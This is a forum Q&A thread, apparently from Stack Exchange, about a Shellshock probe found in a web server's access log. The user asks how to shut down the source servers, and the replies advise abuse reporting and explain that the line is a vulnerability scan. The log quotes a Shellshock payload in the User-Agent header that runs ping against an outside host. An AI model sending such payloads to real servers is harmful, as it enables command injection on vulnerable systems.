# Can someone shut the "198.101.206.138" and "89.207.135.125" down?

Tags: bash

```
egrep "};|}\s*;" /var/www/logs/access* 
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
```

How can we shut down the server behind the IP that did this?

Comment: according to the rules, its not really allowed to ask such questions here, but since you clearly have no idea how to handle this, i awnsered you aanyways, still flagged for closure though

Comment: search for the ip on whois, find out the abuse address, contact those. Most likely the server behind that ip is also a victim.

Comment: One of the addresses maps to a .bz (Belize) domain; the other is a Rackspace server.

Answer (score 4):

The log entry you're showing isn't an attack.  It's simply a probe to see if you're vulnerable: `/bin/ping -c 1 198.101.206.138` means "send a single ICMP echo packet to 198.101.206.138".  Further, it only works on systems storing CGI scripts in the non-standard `/cgi-sys/` directory, rather than the usual `/cgi-bin/`.

Comment: That leaves us with two options: 1. (badguy) someone first probing and then attacking, 2. (good guy) someone wanting to find out how many servers are vulnerable. In the case of 2 however it would be nice to send at least some contact address in the user agent, like [these nice guys](http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html).